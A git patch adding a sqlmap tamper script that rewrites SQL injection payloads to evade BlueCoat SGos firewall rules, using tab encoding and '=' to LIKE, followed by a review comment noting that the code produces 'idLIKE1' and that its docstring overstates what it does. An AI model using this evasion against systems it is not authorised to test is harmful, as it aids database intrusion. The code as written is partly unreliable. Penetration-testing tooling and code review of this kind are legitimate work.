From 60aa7a7cd0e5d38961a5055731456a44d033d9e9 Mon Sep 17 00:00:00 2001
From: Thanatos
Date: Sat, 3 Nov 2012 19:15:22 +0100
Subject: [PATCH] Tamper for BlueCoat SGos WAF
---
tamper/bluecoat.py | 55 ++++++++++++++++++++++++++++++++++++++++++++++
1 file changed, 55 insertions(+)
create mode 100644 tamper/bluecoat.py
diff --git a/tamper/bluecoat.py b/tamper/bluecoat.py
new file mode 100644
index 000000000..a6bc5b1fb
--- /dev/null
+++ b/tamper/bluecoat.py
@@ -0,0 +1,55 @@
+#!/usr/bin/env python
+
+"""
+Copyright (c) 2006-2012 sqlmap developers (http://sqlmap.org/)
+See the file 'doc/COPYING' for copying permission
+"""
+
+import os
+import re
+
+from lib.core.common import singleTimeWarnMessage
+from lib.core.enums import DBMS
+from lib.core.enums import PRIORITY
+
+__priority__ = PRIORITY.LOW
+
+def dependencies():
+ singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL))
+
+def process(match):
+ word = match.group()
+ word = "%sLIKE%s" % (" " if word[0] != " " else "", " " if word[-1] != " " else "")
+ return word
+
+def tamper(payload, headers=None):
+ """
+ First Replaces the space after 'select ' with a valid random blank character.
+ Then replace = with like
+
+ Example:
+ * Input: SELECT id FROM users where id = 1
+ * Output: SELECT%09id FROM users where id like 1
+
+ Requirement:
+ * MySQL, Bluecoat SGos with Waf activated as documented in
+ https://kb.bluecoat.com/index?page=content&id=FAQ2147
+
+ Tested against:
+ * MySQL 5.1, SGos Rules
+
+ Notes:
+ * Useful to bypass BlueCoat recommanded Waf rule configuration
+ """
+
+# ASCII table:
+# TAB 09 horizontal TAB
+ blanks = '%09'
+ retVal = payload
+
+ if payload:
+ for commands in ['SELECT','UPDATE','INSERT','DELETE']:
+ retVal = retVal.replace(commands + ' ', commands + blanks)
+ retVal = re.sub(r"\s*=\s*", lambda match: process(match), retVal)
+
+ return retVal
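Review bot: `process()` drops the separators it is meant to keep: for the docstring's own input `id = 1` the regex `\s*=\s*` matches `' = '`, both conditionals evaluate to `""`, and the result is `idLIKE1` rather than the documented `id like 1`. Padding is only added when the match does not already start or end with a space, but the whole match is consumed by the substitution, so `retVal = re.sub(r"\s*=\s*", " LIKE ", retVal)` gives the documented spacing and makes `process()` and the `lambda match: process(match)` wrapper unnecessary. The `tamper()` docstring also overstates what the loop does: `blanks` is the fixed `'%09'`, not a "random blank character", and only upper-case `SELECT`, `UPDATE`, `INSERT` and `DELETE` followed by a space are rewritten, so the first two lines should say that. It would also help to note there that every `=` in the payload is replaced, including the one inside `!=`, `<=` and `>=`.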